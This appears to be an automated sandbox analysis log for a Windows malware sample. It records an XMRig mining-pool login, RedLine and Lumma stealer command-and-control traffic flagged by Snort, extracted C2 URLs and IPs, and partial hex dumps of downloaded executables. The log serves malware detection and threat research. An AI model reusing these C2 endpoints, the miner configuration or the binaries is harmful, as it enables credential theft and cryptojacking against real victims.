{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46vrah7nvakcauietrwijs6z6a6sltzecbbqgrmhg2ssjzmwhwlkok6ukmxbupxsfuqa1qxqhbbbygy1bd8vj6nzqmweh3q","pass":"","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}

Source: 1Vkf7silOj.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.31.196.208:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.7:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.28.36.182:443 -> 192.168.2.7:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.7:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.67.42.145:443 -> 192.168.2.7:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49769 version: TLS 1.2

Source: 1Vkf7silOj.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000036.00000002.2158377669.000000006BBCD000.00000002.00000001.01000000.00000022.sdmp, mozglue[1].dll.54.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.54.dr, freebl3.dll.54.dr
Source:	Binary string: wextract.pdb source: Installer.exe, 00000015.00000002.1923288884.00007FF6D02F9000.00000002.00000001.01000000.00000015.sdmp, Installer.exe, 00000015.00000000.1732577971.00007FF6D02F9000.00000002.00000001.01000000.00000015.sdmp, Installer[1].exe.10.dr
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: svhosts.exe, 00000029.00000002.3916966194.0000000005F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.54.dr, freebl3.dll.54.dr
Source:	Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000036.00000002.2160559519.000000006CDFF000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: wextract.pdbGCTL source: Installer.exe, 00000015.00000002.1923288884.00007FF6D02F9000.00000002.00000001.01000000.00000015.sdmp, Installer.exe, 00000015.00000000.1732577971.00007FF6D02F9000.00000002.00000001.01000000.00000015.sdmp, Installer[1].exe.10.dr
Source:	Binary string: C:\Users\Anton\Desktop\UnionFiles\UnionFiles\obj\Debug\union.pdb9 source: alex5555555.exe, 00000024.00000002.1961435191.000000000099D000.00000004.00000001.01000000.00000019.sdmp, RegAsm.exe, 00000025.00000002.3789215805.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdbO source: svhosts.exe, 00000029.00000002.3916966194.0000000005F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdb source: O3B6wY7ZkFhh.exe, 00000031.00000003.2096843512.0000027E7E510000.00000004.00001000.00020000.00000000.sdmp, O3B6wY7ZkFhh.exe, 00000031.00000002.2105790979.000000C0001A3000.00000004.00001000.00020000.00000000.sdmp, O3B6wY7ZkFhh.exe, 00000031.00000003.2097093034.0000027E7E4D0000.00000004.00001000.00020000.00000000.sdmp, O3B6wY7ZkFhh.exe, 00000031.00000002.2101844018.000000C00009E000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb~ source: svhosts.exe, 00000029.00000002.3916966194.0000000005F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000000D.00000002.3790980158.00000000008F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.54.dr, vcruntime140.dll.54.dr
Source:	Binary string: C:\Users\Anton\Desktop\UnionFiles\UnionFiles\obj\Debug\union.pdb source: alex5555555.exe, 00000024.00000002.1961435191.000000000099D000.00000004.00000001.01000000.00000019.sdmp, RegAsm.exe, 00000025.00000002.3789215805.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000000D.00000002.3915719731.0000000005F25000.00000004.00000020.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3924492126.0000000006BE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: aspnet_regiis.exe, 00000036.00000002.2160559519.000000006CDFF000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000000D.00000002.3791536880.0000000000995000.00000004.00000020.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3804687281.00000000010C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000036.00000002.2158377669.000000006BBCD000.00000002.00000001.01000000.00000022.sdmp, mozglue[1].dll.54.dr
Source:	Binary string: BitLockerToGo.pdbGCTL source: O3B6wY7ZkFhh.exe, 00000031.00000003.2096843512.0000027E7E510000.00000004.00001000.00020000.00000000.sdmp, O3B6wY7ZkFhh.exe, 00000031.00000002.2105790979.000000C0001A3000.00000004.00001000.00020000.00000000.sdmp, O3B6wY7ZkFhh.exe, 00000031.00000003.2097093034.0000027E7E4D0000.00000004.00001000.00020000.00000000.sdmp, O3B6wY7ZkFhh.exe, 00000031.00000002.2101844018.000000C00009E000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32[ source: svhosts.exe, 00000029.00000002.3919826087.0000000006001000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 12_2_00169BD3 FindFirstFileExW,		12_2_00169BD3
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 18_2_0062DAAD FindFirstFileExW,		18_2_0062DAAD

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File opened: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 4x nop then inc dword ptr [ebp-20h]	1_2_058325D8
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 4x nop then jmp 06D436C7h	1_2_06D42F68
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 4x nop then jmp 06D43EFBh	1_2_06D43C38
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 4x nop then jmp 06D46DF8h	1_2_06D46900
Source: C:\Users\user\Desktop\1Vkf7silOj.exe	Code function: 4x nop then jmp 06D4147Eh	1_2_06D4145D

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.7:49707 -> 185.215.113.67:40960
Source: Traffic	Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.7:49707 -> 185.215.113.67:40960
Source: Traffic	Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 185.215.113.67:40960 -> 192.168.2.7:49707
Source: Traffic	Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 185.215.113.67:40960 -> 192.168.2.7:49707
Source: Traffic	Snort IDS: 2053754 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (facilitycoursedw .shop) 192.168.2.7:53318 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2053752 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (publicitycharetew .shop) 192.168.2.7:63750 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2053762 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (computerexcudesp .shop) 192.168.2.7:57525 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2053760 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (leafcalfconflcitw .shop) 192.168.2.7:56934 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2053758 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (injurypiggyoewirog .shop) 192.168.2.7:59643 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2053756 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (bargainnygroandjwk .shop) 192.168.2.7:64031 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2053764 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (disappointcredisotw .shop) 192.168.2.7:57877 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2053750 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (doughtdrillyksow .shop) 192.168.2.7:56103 -> 1.1.1.1:53

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 65.21.175.0/108e010e8f91c38c.php
Source: Malware configuration extractor	URLs: http://65.21.175.0/108e010e8f91c38c.php
Source: Malware configuration extractor	URLs: http://movlat.com/tmp/
Source: Malware configuration extractor	URLs: http://llcbc.org/tmp/
Source: Malware configuration extractor	URLs: http://lindex24.ru/tmp/
Source: Malware configuration extractor	URLs: http://qeqei.xyz/tmp/
Source: Malware configuration extractor	URLs: o7labs.top/online/support/index.php
Source: Malware configuration extractor	URLs: 185.215.113.67:40960

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: bargainnygroandjwk.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: computerexcudesp.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: panameradovkews.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: proffyrobharborye.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: leafcalfconflcitw.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: depositybounceddwk.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: aplointexhausdh.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: publicitycharetew.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: facilitycoursedw.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: disappointcredisotw.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: doughtdrillyksow.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: manufactiredowreachhd.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: compilecoppydkewsw.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: injurypiggyoewirog.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: slammyslideplanntywks.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: exertcreatedadnndjw.xyz replaycode: Name error (3)

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 8888
Source: unknown	Network traffic detected: HTTP traffic on port 8888 -> 49776

Source: global traffic	TCP traffic: 192.168.2.7:49707 -> 185.215.113.67:40960
Source: global traffic	TCP traffic: 192.168.2.7:49731 -> 4.184.236.127:1110
Source: global traffic	TCP traffic: 192.168.2.7:49761 -> 43.153.49.49:8888
Source: global traffic	TCP traffic: 192.168.2.7:49771 -> 185.172.128.33:8970
Source: global traffic	TCP traffic: 192.168.2.7:49861 -> 85.28.47.7:17210

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:58:37 GMTContent-Type: application/octet-streamContent-Length: 1850368Last-Modified: Thu, 27 Jun 2024 00:47:45 GMTConnection: keep-aliveETag: "667cb6b1-1c3c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2a cf 5e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 70 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 49 00 00 04 00 00 28 a9 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 50 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 50 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 29 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 70 63 68 7a 7a 74 66 00 30 19 00 00 30 30 00 00 24 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 61 6d 61 71 6d 6e 6d 00 10 00 00 00 60 49 00 00 04 00 00 00 16 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 49 00 00 22 00 00 00 1a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:58:48 GMTContent-Type: application/octet-streamContent-Length: 505344Last-Modified: Mon, 24 Jun 2024 19:43:11 GMTConnection: keep-aliveETag: "6679cc4f-7b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 86 4f 44 4d c2 2e 2a 1e c2 2e 2a 1e c2 2e 2a 1e 11 5c 29 1f d3 2e 2a 1e 11 5c 2f 1f 6b 2e 2a 1e 11 5c 2e 1f d4 2e 2a 1e 00 af 2e 1f d0 2e 2a 1e 11 5c 2b 1f cb 2e 2a 1e c2 2e 2b 1e 45 2e 2a 1e 00 af 2f 1f 9e 2e 2a 1e 00 af 29 1f da 2e 2a 1e 31 ac 2f 1f c3 2e 2a 1e 31 ac 28 1f c3 2e 2a 1e 52 69 63 68 c2 2e 2a 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ce 9c 79 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 14 02 00 00 ae 05 00 00 00 00 00 e8 96 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac d9 02 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 07 00 28 21 00 00 c8 ae 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 af 02 00 18 00 00 00 08 ae 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f2 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 42 53 73 00 00 00 00 0d 0e 00 00 00 20 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b0 b2 00 00 00 30 02 00 00 b4 00 00 00 18 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 94 d7 04 00 00 f0 02 00 00 c8 04 00 00 cc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 28 21 00 00 00 d0 07 00 00 22 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:58:51 GMTContent-Type: application/octet-streamContent-Length: 424960Last-Modified: Sun, 16 Jun 2024 06:41:45 GMTConnection: keep-aliveETag: "666e8929-67c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 29 89 6e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 ea d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 00 06 00 8c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 dc 4b 00 00 90 90 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 91 05 00 18 00 00 00 c8 90 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 cc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9a e3 04 00 00 10 00 00 00 e4 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3a 10 01 00 00 00 05 00 00 12 01 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 65 00 00 00 20 06 00 00 34 00 00 00 fa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 4b 00 00 00 a0 06 00 00 4c 00 00 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:58:57 GMTContent-Type: application/octet-streamContent-Length: 424960Last-Modified: Wed, 19 Jun 2024 12:58:24 GMTConnection: keep-aliveETag: "6672d5f0-67c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f0 d5 72 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 ea d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 00 06 00 8c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 dc 4b 00 00 90 90 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 91 05 00 18 00 00 00 c8 90 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 cc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9a e3 04 00 00 10 00 00 00 e4 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3a 10 01 00 00 00 05 00 00 12 01 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 65 00 00 00 20 06 00 00 34 00 00 00 fa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 4b 00 00 00 a0 06 00 00 4c 00 00 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 